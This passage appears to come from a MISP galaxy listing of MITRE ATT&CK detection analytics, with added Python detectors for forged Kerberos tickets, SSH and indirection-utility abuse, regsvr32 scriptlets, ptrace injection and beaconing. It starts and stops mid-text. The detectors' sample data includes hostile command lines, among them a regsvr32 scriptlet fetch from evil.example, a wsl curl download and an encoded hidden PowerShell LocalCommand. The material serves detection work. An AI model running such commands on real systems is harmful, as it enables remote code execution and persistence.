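The Host header is only visible where TLS is terminated or inspected; on an ESXi management network the practical source is the proxy or egress gateway, since hostd and vpxa are not expected to talk to public CDNs at all, so for that platform a mismatch from any management process is worth a high severity regardless of signing.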

Analytic 0756 - AN0756

Adversary modifies tenant policy through changes to federation configuration, trust settings, or identity provider additions in Microsoft 365/AzureAD via Portal, PowerShell, or Graph API. Includes setting authentication to federated or updating federated domains.

Internal MISP references

UUID 65a1926d-e504-4153-b19f-555e8a06e5a5 which can be used as unique global reference for Analytic 0756 - AN0756 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0756
mitre_platforms ['Identity Provider']

Analytic 0657 - AN0657

Phishing attachment detection on macOS through correlation of Mail app logs, file creation in user directories, and abnormal process execution (e.g., Preview.app or Mail.app spawning Terminal or scripting binaries). Network traffic after attachment interaction is also monitored.

Internal MISP references

UUID 7a6192b4-997a-4526-bb3d-76664bc31274 which can be used as unique global reference for Analytic 0657 - AN0657 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0657
mitre_platforms ['macOS']

Analytic 0675 - AN0675

Detects forged Kerberos Silver Tickets by identifying anomalous service ticket activity: logon events (4624) with malformed or unexpected fields, service ticket use on a host with no corresponding TGS request (4769) recorded by the KDC (a forged ticket is minted offline and never passes through the KDC), and access by service accounts from hosts or to resources outside their expected scope. Also monitors suspicious processes accessing LSASS memory, since the service account hash needed to forge the ticket is typically obtained by credential dumping.

Internal MISP references

UUID 88ece783-08bc-41e6-a000-a63f540768cc which can be used as unique global reference for Analytic 0675 - AN0675 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0675
mitre_platforms ['Windows']
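
The 4624-to-4769 correlation that AN0675 describes, as an added example that is not part of the MITRE analytic. The field names follow the Windows Security log, the events themselves are constructed, and EXPECTED_NETBIOS (the domain's NetBIOS name as it appears in normal 4624s) is an assumption.

```python
"""Added example for AN0675: find Kerberos network logons (4624) on member hosts
that have no matching service ticket request (4769) at the DC, or whose domain
field has the wrong shape. Not MITRE code; events are constructed."""
from datetime import datetime, timedelta
from typing import List

EXPECTED_NETBIOS = "CORP"   # assumption: NetBIOS domain name seen in legitimate 4624s


def _t(s: str) -> datetime:
    return datetime.fromisoformat(s)


def _account(name: str) -> str:
    """Normalise 'alice@CORP.LOCAL' / 'ALICE' to one comparable key."""
    return name.split("@")[0].lower()


# Constructed DC events (Security log of the KDC).
DC_EVENTS = [
    {"EventID": 4769, "time": "2024-05-01T08:00:05", "TargetUserName": "alice@CORP.LOCAL",
     "ServiceName": "FS01$", "IpAddress": "10.0.0.21"},
    {"EventID": 4769, "time": "2024-05-01T08:30:00", "TargetUserName": "bob@CORP.LOCAL",
     "ServiceName": "FS01$", "IpAddress": "10.0.0.22"},
]

# Constructed member-server events (Security log of FS01).
HOST_EVENTS = [
    {"EventID": 4624, "time": "2024-05-01T08:00:07", "Computer": "FS01", "LogonType": 3,
     "AuthenticationPackageName": "Kerberos", "TargetUserName": "alice",
     "TargetDomainName": "CORP", "IpAddress": "10.0.0.21"},
    {"EventID": 4624, "time": "2024-05-01T08:31:00", "Computer": "FS01", "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "TargetUserName": "bob",
     "TargetDomainName": "CORP", "IpAddress": "10.0.0.22"},
    {"EventID": 4624, "time": "2024-05-01T09:15:00", "Computer": "FS01", "LogonType": 3,
     "AuthenticationPackageName": "Kerberos", "TargetUserName": "svc_backup",
     "TargetDomainName": "corp.local", "IpAddress": "10.0.0.99"},
]


def find_unbacked_kerberos_logons(host_events, dc_events, window_minutes=10) -> List[dict]:
    """Return Kerberos 4624s with no 4769 for the same account in the preceding
    window, plus a 'domain_format' reason when TargetDomainName is not NetBIOS."""
    tgs_by_account = {}
    for ev in dc_events:
        if ev["EventID"] == 4769:
            tgs_by_account.setdefault(_account(ev["TargetUserName"]), []).append(_t(ev["time"]))
    window = timedelta(minutes=window_minutes)
    findings = []
    for ev in host_events:
        if ev["EventID"] != 4624 or ev.get("AuthenticationPackageName") != "Kerberos":
            continue                                   # NTLM logons are a different analytic
        logon_time = _t(ev["time"])
        reasons = []
        recent = [t for t in tgs_by_account.get(_account(ev["TargetUserName"]), [])
                  if logon_time - window <= t <= logon_time]
        if not recent:
            reasons.append("no_tgs_request")           # KDC never issued this ticket
        if ev["TargetDomainName"] != EXPECTED_NETBIOS:
            reasons.append("domain_format")            # forged tickets often carry the DNS name
        if reasons:
            findings.append({"host": ev["Computer"], "user": ev["TargetUserName"],
                             "source": ev["IpAddress"], "time": ev["time"],
                             "reasons": reasons})
    return findings
```

Two caveats before deploying this shape: 4769 is only written when "Audit Kerberos Service Ticket Operations" is enabled on the DCs, and in a multi-DC domain the dc_events input has to be the merged log of every KDC, otherwise every logon served by an unmonitored DC looks forged.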

Analytic 0576 - AN0576

Cause→effect chain: (1) A user or service launches an indirection utility (e.g., forfiles.exe, pcalua.exe, wsl.exe, scriptrunner.exe, ssh.exe with -o ProxyCommand/LocalCommand). (2) That utility spawns a secondary program/command (PowerShell, cmd, msiexec, regsvr32, curl, arbitrary EXE) and/or opens outbound network connections. (3) Optional precursor modification of SSH config to persist LocalCommand/ProxyCommand. Correlate process creation, command/script content, file access to %USERPROFILE%\.ssh\config, and network connections from the utility or its child.

Internal MISP references

UUID 9f3aea30-e100-432a-8aa0-959bd7f4e069 which can be used as unique global reference for Analytic 0576 - AN0576 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0576
mitre_platforms ['Windows']
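
The two inputs AN0576 asks a defender to correlate, the SSH client config and the indirection utilities' command lines, as an added example that is not part of the MITRE analytic. The config text and the process-creation records are constructed; the argument patterns per utility are assumptions drawn from each tool's documented syntax.

```python
"""Added example for AN0576: parse an OpenSSH client config for ProxyCommand /
LocalCommand persistence and scan command lines for indirection utilities.
Not MITRE code; config text and command lines are constructed."""
import re
from typing import Dict, List

# Constructed %USERPROFILE%\.ssh\config contents.
SSH_CONFIG = """
Host bastion
    HostName bastion.corp.example
    ProxyCommand ssh -W %h:%p jump.corp.example

Host *
    PermitLocalCommand yes
    LocalCommand powershell -w hidden -enc SQBFAFgA
"""

# Constructed process-creation records: (image, command line, child image or None).
PROC_EVENTS = [
    ("ssh.exe", 'ssh.exe -o ProxyCommand="cmd /c start calc.exe" user@host', "cmd.exe"),
    ("forfiles.exe", 'forfiles /p C:\\Windows\\System32 /m notepad.exe /c "cmd /c calc.exe"', "cmd.exe"),
    ("pcalua.exe", 'pcalua.exe -a C:\\Users\\bob\\Downloads\\setup.exe', "setup.exe"),
    ("wsl.exe", 'wsl.exe -e curl http://198.51.100.7/x.sh', "curl"),
    ("ssh.exe", "ssh.exe bastion", None),
    ("explorer.exe", "explorer.exe", "notepad.exe"),
]

# Per-utility argument that hands control to an arbitrary command (assumption per tool).
INDIRECTION = {
    "forfiles.exe": re.compile(r"\s/c\s", re.I),
    "pcalua.exe": re.compile(r"\s-a\s", re.I),
    "wsl.exe": re.compile(r"\s(-e|--exec|--)\s", re.I),
    "scriptrunner.exe": re.compile(r"-appvscript", re.I),
    "ssh.exe": re.compile(r"-o\s*\"?(ProxyCommand|LocalCommand)", re.I),
}


def ssh_config_commands(text: str) -> List[Dict[str, str]]:
    """Return every ProxyCommand/LocalCommand with the Host block it sits in.
    Handles both 'Key value' and 'Key=value' spellings."""
    out, host = [], "(global)"
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        key, value = parts[0], (parts[1] if len(parts) > 1 else "")
        if key.lower() == "host":
            host = value.strip()
        elif key.lower() in ("proxycommand", "localcommand"):
            out.append({"host": host, "option": key, "command": value.strip()})
    return out


def indirect_execution(events) -> List[dict]:
    """Records where a known indirection utility was given a command to run."""
    out = []
    for image, cmd, child in events:
        pat = INDIRECTION.get(image.lower())
        if pat and pat.search(cmd):
            out.append({"image": image, "child": child, "cmd": cmd})
    return out
```

LocalCommand only executes when PermitLocalCommand is yes in the same or an enclosing block, so a config finding on LocalCommand should be checked against that option before it is escalated; ProxyCommand needs no such gate and runs on every connection to the matching host.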

Analytic 0856 - AN0856

Correlated file access to insecurely stored credential files (e.g., .env files, XML configuration, .ps1 scripts with embedded passwords) followed by suspicious process execution or authentication using the retrieved credentials. Detected through Sysmon logs and Windows Security Event logs.

Internal MISP references

UUID 0277e29a-af6d-4242-a187-32673328664a which can be used as unique global reference for Analytic 0856 - AN0856 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0856
mitre_platforms ['Windows']

Analytic 0568 - AN0568

A non-standard process (or script-hosted process) loads camera/video-capture libraries (e.g., avicap32.dll, mf.dll, ksproxy.ax), opens the Camera Frame Server/device, writes video/image artifacts (e.g., .mp4/.avi/.yuv) to unusual locations, and optionally initiates outbound transfer shortly after.

Internal MISP references

UUID 171803bb-8aa7-42df-861a-18d6d694f909 which can be used as unique global reference for Analytic 0568 - AN0568 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0568
mitre_platforms ['Windows']

Analytic 0865 - AN0865

Detects unauthorized additions of users or machine accounts to privileged local or domain groups (e.g., Administrators, Remote Desktop Users).

Internal MISP references

UUID 58bed5f5-6ef5-4558-9ac9-b58f8aa9888c which can be used as unique global reference for Analytic 0865 - AN0865 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0865
mitre_platforms ['Windows']

Analytic 0586 - AN0586

Adversary launches high-entropy process or malformed app bundle causing repeated application crashes and system slowdowns.

Internal MISP references

UUID 5f2cc434-5edc-4f36-927a-eb48ee72aa6e which can be used as unique global reference for Analytic 0586 - AN0586 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0586
mitre_platforms ['macOS']

Analytic 0685 - AN0685

Monitor FaceTime, iMessage, or SIP client logs for anomalous voice call attempts, and link them to subsequent user execution events (downloads, RMM installs) triggered after the call.

Internal MISP references

UUID 756214e0-660d-4f32-a4f1-f8ff24a7852f which can be used as unique global reference for Analytic 0685 - AN0685 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0685
mitre_platforms ['macOS']

Analytic 0658 - AN0658

Detection of modified or newly created /etc/rc.local or /etc/init.d scripts followed by suspicious execution during system startup.

Internal MISP references

UUID 98f8728d-ff74-47cb-b884-25071a21f77e which can be used as unique global reference for Analytic 0658 - AN0658 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0658
mitre_platforms ['Linux']

Analytic 0596 - AN0596

Adversary uses a process to establish outbound connections that transmit uniform packet sizes at a consistent interval, avoiding threshold-based network alerts.

Internal MISP references

UUID 1e9fdc71-d073-403a-9ee9-bab091318454 which can be used as unique global reference for Analytic 0596 - AN0596 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0596
mitre_platforms ['Windows']

Analytic 0956 - AN0956

Token replay or impersonation in federated logins without interactive browser session or MFA prompts.

Internal MISP references

UUID 367cfbd9-fcfd-4336-863e-b6917ff71cb4 which can be used as unique global reference for Analytic 0956 - AN0956 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0956
mitre_platforms ['Identity Provider']

Analytic 0965 - AN0965

Detection of clipboard access via OS utilities (e.g., clip.exe, Get-Clipboard) by non-interactive or abnormal parent processes, potentially chained with staging or exfiltration commands.

Internal MISP references

UUID 48e4aceb-38dd-4bf2-8074-9fee8436985b which can be used as unique global reference for Analytic 0965 - AN0965 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0965
mitre_platforms ['Windows']

Analytic 0659 - AN0659

Detection of edits or additions to /etc/rc.common, /Library/StartupItems, or /System/Library/StartupItems and associated script execution during login or reboot.

Internal MISP references

UUID e716b209-5b06-4bc4-843f-cbe4c51ddc0d which can be used as unique global reference for Analytic 0659 - AN0659 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0659
mitre_platforms ['macOS']

Analytic 0695 - AN0695

Detects adversarial use of cloud-native APIs (e.g., AWS IAM, Azure RBAC, GCP Identity) to enumerate cloud group memberships or policy mappings via unauthorized sessions or scripts.

Internal MISP references

UUID ef4f995e-6f20-42b7-802e-555ac54ab7b9 which can be used as unique global reference for Analytic 0695 - AN0695 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0695
mitre_platforms ['IaaS']

Analytic 0569 - AN0569

A process opens/reads /dev/video* (V4L2), performs ioctl/read loops, writes large/continuous video artifacts to disk, and/or quickly establishes outbound connections for exfiltration.

Internal MISP references

UUID f3c5c71a-da1b-4d09-bda7-ec07b0b7c05d which can be used as unique global reference for Analytic 0569 - AN0569 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0569
mitre_platforms ['Linux']

Analytic 0775 - AN0775

Detection of writes to /boot or EFI directories outside of expected package manager updates. Monitoring kernel log and auditd events for attempts to overwrite bootloader binaries (e.g., grub, shim). Unexpected execution of efibootmgr or dd writing to /dev/sdX devices followed by boot parameter changes.

Internal MISP references

UUID 08dd2c3b-e07c-4b47-bae6-aa09c2a86d87 which can be used as unique global reference for Analytic 0775 - AN0775 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0775
mitre_platforms ['Linux']

Analytic 0757 - AN0757

Detects anomalous process access to LSASS on domain controllers, suspicious module loads of authentication DLLs, and registry or file modifications indicative of Skeleton Key–style patching. Correlates LSASS access attempts with subsequent abnormal logon activity patterns.

Internal MISP references

UUID 40882c73-344f-4138-894e-049b9bb1f460 which can be used as unique global reference for Analytic 0757 - AN0757 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0757
mitre_platforms ['Windows']

Analytic 0577 - AN0577

DLL hijacking behaviors including unexpected DLL loads from non-standard directories, replacement of DLLs, phantom DLL insertion, redirection file creation, and substitution of legitimate DLLs. Defender correlates file system modifications, registry changes, and module load telemetry to detect abnormal DLL behavior in trusted processes.

Internal MISP references

UUID 448ecbfb-2b38-4ecc-9c63-f7dd87339271 which can be used as unique global reference for Analytic 0577 - AN0577 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0577
mitre_platforms ['Windows']

Analytic 0758 - AN0758

Detects unauthorized modification of network device authentication by correlating OS image file changes, checksum mismatches, or memory verification failures with anomalous authentication events. Focus is on behaviors where patched images introduce hardcoded passwords or bypass native authentication.

Internal MISP references

UUID 2f39584b-59bd-43ec-bd0a-5c2eba258ae2 which can be used as unique global reference for Analytic 0758 - AN0758 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0758
mitre_platforms ['Network Devices']

Analytic 0587 - AN0587

Instance enters degraded/unhealthy state due to abnormal process load or memory exhaustion, often caused by automation or script-based attacks.

Internal MISP references

UUID 472f81b1-99ba-406a-b2ef-d70b2af5b527 which can be used as unique global reference for Analytic 0587 - AN0587 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0587
mitre_platforms ['IaaS']

Analytic 0785 - AN0785

Detection focuses on identifying anomalous regsvr32.exe executions that deviate from normal administrative or system use. Defenders may observe regsvr32.exe loading scriptlets or DLLs from unusual paths (especially temporary directories or remote URLs), command-line arguments invoking /i or /u with suspicious file references, network connections initiated by regsvr32.exe, and unsigned or untrusted DLLs being loaded shortly after regsvr32.exe invocation. Correlated sequences include regsvr32.exe process creation, module load of DLL/scriptlet, and optional outbound network traffic.

Internal MISP references

UUID 50658b7e-57c5-4e31-b156-1b294574a9f2 which can be used as unique global reference for Analytic 0785 - AN0785 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0785
mitre_platforms ['Windows']
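
The indicator set AN0785 lists, scored over process-creation records, as an added example that is not part of the MITRE analytic. The record fields (parent, cmd, net) and the sample command lines are constructed; the list of Office parents and the user-writable path pattern are assumptions to tune per environment.

```python
"""Added example for AN0785: score regsvr32.exe process-creation records against
the indicators the analytic lists. Not MITRE code; records are constructed."""
import re
from typing import List, Set

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}   # assumption
REMOTE_SCRIPTLET = re.compile(r"/i:\s*\"?(https?://[^\s\"]+)", re.I)
USER_WRITABLE = re.compile(
    r"\\(Users\\[^\\]+\\(AppData|Downloads)|Users\\Public|Windows\\Temp|ProgramData)\\", re.I)

# Constructed sample process-creation records.
SAMPLE_RECORDS = [
    {"parent": "msiexec.exe", "net": False,
     "cmd": r'regsvr32.exe /s "C:\Program Files\Vendor\ctl.dll"'},
    {"parent": "WINWORD.EXE", "net": True,
     "cmd": r'regsvr32.exe /s /n /u /i:http://evil.example/p.sct scrobj.dll'},
    {"parent": "cmd.exe", "net": False,
     "cmd": r'regsvr32 /s C:\Users\bob\AppData\Local\Temp\x.dll'},
]


def indicators(rec: dict) -> Set[str]:
    cmd = rec["cmd"]
    found = set()
    if REMOTE_SCRIPTLET.search(cmd):
        found.add("remote_scriptlet")          # /i:http... pulls a .sct from the network
    if "scrobj.dll" in cmd.lower():
        found.add("scrobj_dll")                # COM scriptlet host, the classic pairing
    if USER_WRITABLE.search(cmd):
        found.add("user_writable_path")        # DLL from Temp/AppData/Downloads/Public
    if rec["parent"].lower() in OFFICE_PARENTS:
        found.add("office_parent")             # macro-launched
    if rec["net"]:
        found.add("network_connection")        # regsvr32 itself opened a socket
    return found


def triage(records: List[dict], min_indicators: int = 1) -> List[dict]:
    """Records with at least min_indicators hits, each with its sorted indicator list."""
    out = []
    for rec in records:
        hits = indicators(rec)
        if len(hits) >= min_indicators:
            out.append({"cmd": rec["cmd"], "indicators": sorted(hits)})
    return out
```

A single indicator is noisy on fleets where installers register DLLs from Temp; requiring two or more, or weighting remote_scriptlet and network_connection higher than the rest, keeps the Squiblydoo-style `/s /n /u /i:URL scrobj.dll` case at the top of the queue.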

Analytic 0578 - AN0578

Detects interactive or scripted abuse of cmd.exe, batch files, or shell invocation chains. Focuses on parent-child relationships (e.g., cmd.exe launched from unusual parents), anomalous command-line parameters, and chaining with discovery, credential access, or lateral movement behaviors.

Internal MISP references

UUID 60d70569-0d28-4d98-957c-4676b2411685 which can be used as unique global reference for Analytic 0578 - AN0578 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0578
mitre_platforms ['Windows']

Analytic 0857 - AN0857

File reads or process executions involving insecurely stored credential files (e.g., config files with password fields) by non-root or anomalous users followed by ssh authentication attempts.

Internal MISP references

UUID 7ff5d08a-5d4d-4260-85ee-fdb6a244f258 which can be used as unique global reference for Analytic 0857 - AN0857 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0857
mitre_platforms ['Linux']

Analytic 0875 - AN0875

Detects suspicious execution of network monitoring tools (e.g., Wireshark, tshark, Microsoft Message Analyzer), driver loading indicative of promiscuous mode, or non-admin user privilege escalation to access NICs for capture.

Internal MISP references

UUID b3579b0f-7daf-40bd-af1c-f5cd020942e6 which can be used as unique global reference for Analytic 0875 - AN0875 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0875
mitre_platforms ['Windows']

Analytic 0975 - AN0975

Correlate registry modifications (e.g., UAC bypass registry keys), unusual parent-child process relationships (e.g., control.exe spawning cmd.exe), and unsigned elevated process executions with non-standard tokens or elevation flags.

Internal MISP references

UUID 11f18771-dd49-45f7-8ef5-05d3426d82d5 which can be used as unique global reference for Analytic 0975 - AN0975 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0975
mitre_platforms ['Windows']

Analytic 0795 - AN0795

Monitor SaaS mail platforms (Google Workspace, M365, Okta-integrated apps) for SendAs/SendOnBehalfOf operations where the delegated permissions are unusual or newly granted. Detect impersonation attempts where adversaries configure rules to auto-forward or auto-reply with impersonated content.

Internal MISP references

UUID 2266c86a-a47e-46ac-aa6d-c1eb6d49a1e5 which can be used as unique global reference for Analytic 0795 - AN0795 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0795
mitre_platforms ['SaaS']

Analytic 0597 - AN0597

Outbound connections from non-network-facing processes repeatedly send similarly sized payloads within uniform time intervals.

Internal MISP references

UUID 4baad14d-46b1-4e96-9e2a-138ae4e3ec75 which can be used as unique global reference for Analytic 0597 - AN0597 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0597
mitre_platforms ['Linux']

Analytic 0957 - AN0957

Unusual reuse of OAuth access tokens from different geographic regions, without full login events.

Internal MISP references

UUID 7fb5fe4f-ecd1-45a1-8a0f-dc913587e650 which can be used as unique global reference for Analytic 0957 - AN0957 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0957
mitre_platforms ['SaaS']

Analytic 0759 - AN0759

Processes that normally do not initiate network connections establishing outbound encrypted TLS/SSL sessions, especially with asymmetric traffic volumes (client sending more than receiving) or non-standard certificate chains. Defender observations correlate process creation with unexpected network encryption libraries being loaded.

Internal MISP references

UUID 81233639-a08b-4a56-a5d4-ac2f9ae94a2b which can be used as unique global reference for Analytic 0759 - AN0759 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0759
mitre_platforms ['Windows']

Analytic 0579 - AN0579

Detects ptrace-based process injection by correlating audit logs of ptrace syscalls, memory modifications (e.g., PTRACE_POKETEXT, PTRACE_POKEDATA), and suspicious register manipulation (PTRACE_SETREGS) on a target process not normally debugged by the originator. Alerts on processes attempting to ptrace non-child or privileged processes, especially when followed by abnormal memory or execution behavior.

Internal MISP references

UUID d9bcfaee-d2d1-4673-b834-5c219f8dba9b which can be used as unique global reference for Analytic 0579 - AN0579 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0579
mitre_platforms ['Linux']
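
The audit-log side of AN0579, as an added example that is not part of the MITRE analytic: parse auditd SYSCALL records for ptrace and flag tracers whose target is not one of their own descendants. The audit lines and the pid-to-ppid tree are constructed; in practice the tree would come from /proc or the EDR's process telemetry, and the rule producing the lines is assumed to be `-a always,exit -F arch=b64 -S ptrace -k ptrace`.

```python
"""Added example for AN0579: parse auditd SYSCALL records for ptrace (x86_64
syscall 101) and flag tracers attaching to, or writing into, processes that are
not their own descendants. Not MITRE code; lines and process tree are constructed."""
import re
from typing import Dict, List, Tuple

PTRACE_SYSCALL_X86_64 = 101
REQUESTS = {0x0: "TRACEME", 0x4: "POKETEXT", 0x5: "POKEDATA", 0xd: "SETREGS",
            0x10: "ATTACH", 0x4206: "SEIZE"}
WRITE_LIKE = {"POKETEXT", "POKEDATA", "SETREGS"}
KV = re.compile(r'(\w+)=("[^"]*"|\S+)')

# Constructed process tree: pid -> ppid (1 is init).
PROC_TREE: Dict[int, int] = {1: 0, 700: 1, 1900: 1, 2000: 1900, 2001: 2000, 2500: 1, 3000: 2500}

# Constructed audit lines: gdb attaching to its own child, then an injector hitting pid 700.
SAMPLE_LINES = [
    'type=SYSCALL msg=audit(1714550400.100:500): arch=c000003e syscall=101 success=yes exit=0 '
    'a0=10 a1=7d1 a2=0 a3=0 ppid=1900 pid=2000 uid=1000 comm="gdb" exe="/usr/bin/gdb" key="ptrace"',
    'type=SYSCALL msg=audit(1714550400.200:501): arch=c000003e syscall=101 success=yes exit=0 '
    'a0=10 a1=2bc a2=0 a3=0 ppid=2500 pid=3000 uid=1000 comm="inject" exe="/tmp/inject" key="ptrace"',
    'type=SYSCALL msg=audit(1714550400.300:502): arch=c000003e syscall=101 success=yes exit=0 '
    'a0=4 a1=2bc a2=7f1234 a3=cc ppid=2500 pid=3000 uid=1000 comm="inject" exe="/tmp/inject" key="ptrace"',
    'type=SYSCALL msg=audit(1714550400.400:503): arch=c000003e syscall=101 success=yes exit=0 '
    'a0=d a1=2bc a2=0 a3=7ffc ppid=2500 pid=3000 uid=1000 comm="inject" exe="/tmp/inject" key="ptrace"',
    'type=SYSCALL msg=audit(1714550400.500:504): arch=c000003e syscall=59 success=yes exit=0 '
    'a0=1 a1=2 a2=3 a3=4 ppid=2500 pid=3001 uid=1000 comm="ls" exe="/bin/ls" key="exec"',
]


def parse_audit(line: str) -> Dict[str, str]:
    """Split an audit record into its key=value fields (quotes stripped)."""
    return {k: v.strip('"') for k, v in KV.findall(line)}


def is_descendant(pid: int, ancestor: int, tree: Dict[int, int]) -> bool:
    """Walk pid -> ppid until we reach ancestor or run out of tree."""
    seen = set()
    while pid in tree and pid not in seen:
        seen.add(pid)
        pid = tree[pid]
        if pid == ancestor:
            return True
    return False


def suspicious_ptrace(lines: List[str], tree: Dict[int, int]) -> List[Tuple[int, int, str]]:
    """Return (tracer_pid, target_pid, request) for ptrace calls on non-descendants."""
    out = []
    for line in lines:
        f = parse_audit(line)
        if f.get("type") != "SYSCALL" or f.get("arch") != "c000003e":
            continue                      # syscall numbers are per-arch; 101 is ptrace on x86_64 only
        if int(f.get("syscall", -1)) != PTRACE_SYSCALL_X86_64:
            continue
        request = REQUESTS.get(int(f["a0"], 16), "REQ_" + f["a0"])   # a0 is hex in audit logs
        target = int(f["a1"], 16)                                    # a1 = traced pid
        tracer = int(f["pid"])
        if request == "TRACEME":
            continue                      # the child asks to be traced: normal debugger flow
        if not is_descendant(target, tracer, tree):
            out.append((tracer, target, request))
    return out
```

Yama's ptrace_scope=1 already refuses non-descendant attaches from unprivileged callers, so on hardened hosts a successful non-child ATTACH implies CAP_SYS_PTRACE or root; checking success=yes and uid together with the tree tells apart a blocked attempt from a completed injection.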

Analytic 0588 - AN0588

Container orchestrator logs show crashlooping pods, repeated resource exhaustion, or malicious binaries running infinite loops that exhaust cgroup CPU or memory limits.

Internal MISP references

UUID 7027622a-7a33-4189-a500-c54eef3467b6 which can be used as unique global reference for Analytic 0588 - AN0588 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0588
mitre_platforms ['Containers']

Analytic 0885 - AN0885

Execution of CLI commands erasing file systems or storage (erase flash:, format disk, erase nvram:). Detect authentication events followed by destructive commands within the same privileged session.

Internal MISP references

UUID d0e64036-83fb-4ff7-b81b-9b67b6c6b9dc which can be used as unique global reference for Analytic 0885 - AN0885 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0885
mitre_platforms ['Network Devices']

Analytic 0858 - AN0858

Terminal-based grep or open of plist/config files containing credentials, correlated with Keychain or system login attempts.

Internal MISP references

UUID df289d0f-0f31-487e-b213-9a492d903f2c which can be used as unique global reference for Analytic 0858 - AN0858 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0858
mitre_platforms ['macOS']

Analytic 0958 - AN0958

Container process uses mounted cloud credentials or token cache to authenticate without known orchestration.

Internal MISP references

UUID 2127b359-24b0-40e2-a202-67e53d5be3b0 which can be used as unique global reference for Analytic 0958 - AN0958 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0958
mitre_platforms ['Containers']

Analytic 0985 - AN0985

Detects binaries or launch daemons in /System/Library or /Applications with mismatched bundle names, unexpected metadata, or improper installation origin.

Internal MISP references

UUID 466a2102-fcb3-4372-9a8d-ad8fe34e94ec which can be used as unique global reference for Analytic 0985 - AN0985 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0985
mitre_platforms ['macOS']

Analytic 0895 - AN0895

Processes such as PowerShell, Git, or curl initiating outbound HTTPS POST requests to known code repository APIs (e.g., github.com, gitlab.com) immediately following large file reads. Defender view: correlation between file access of sensitive directories (e.g., Documents, Finance) and abnormal data uploads to repository domains.

Internal MISP references

UUID 7c7f0049-96af-4acc-9c58-9f8e661adb63 which can be used as unique global reference for Analytic 0895 - AN0895 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0895
mitre_platforms ['Windows']

Analytic 0589 - AN0589

Registry read access associated with suspicious or non-interactive processes querying system config, installed software, or security settings.

Internal MISP references

UUID 8986f2ab-2e6d-4c68-99ac-6a1c5f29fb7b which can be used as unique global reference for Analytic 0589 - AN0589 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0589
mitre_platforms ['Windows']

Analytic 0859 - AN0859

Container processes accessing mounted secrets or configuration paths (e.g., /run/secrets, /mnt/config) followed by network access or credential use.

Internal MISP references

UUID 9c5d279c-eb09-4592-91a4-8cf6436522b6 which can be used as unique global reference for Analytic 0859 - AN0859 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0859
mitre_platforms ['Containers']

Analytic 0598 - AN0598

Processes on macOS, often started from LaunchAgents or running as unexpected users, initiate external connections that consistently transmit data in fixed sizes.

Internal MISP references

UUID d0edef63-9a98-4435-9f4b-2c577c7de41d which can be used as unique global reference for Analytic 0598 - AN0598 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0598
mitre_platforms ['macOS']
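
The regularity test behind AN0596, AN0597 and AN0598 (uniform size, uniform interval, per process and user), as one added example that is not part of the MITRE analytics. The (timestamp, process, user, bytes_sent) tuple layout is an assumption and the sample connections are constructed: one implant-like process checking in every ~60 s with ~512 bytes, and one browser with irregular timing and sizes.

```python
"""Added example for AN0596/AN0597/AN0598: score per-(process,user) outbound
connections for beacon-like regularity using the coefficient of variation of
inter-connection gaps and payload sizes. Not MITRE code; sample data is constructed."""
from collections import defaultdict
from statistics import mean, pstdev
from typing import Dict, List, Tuple

Conn = Tuple[float, str, str, int]   # (timestamp_seconds, process, user, bytes_sent)

# Constructed sample: a beacon (60 s +/- 2, 512/513 B) and a browser (irregular).
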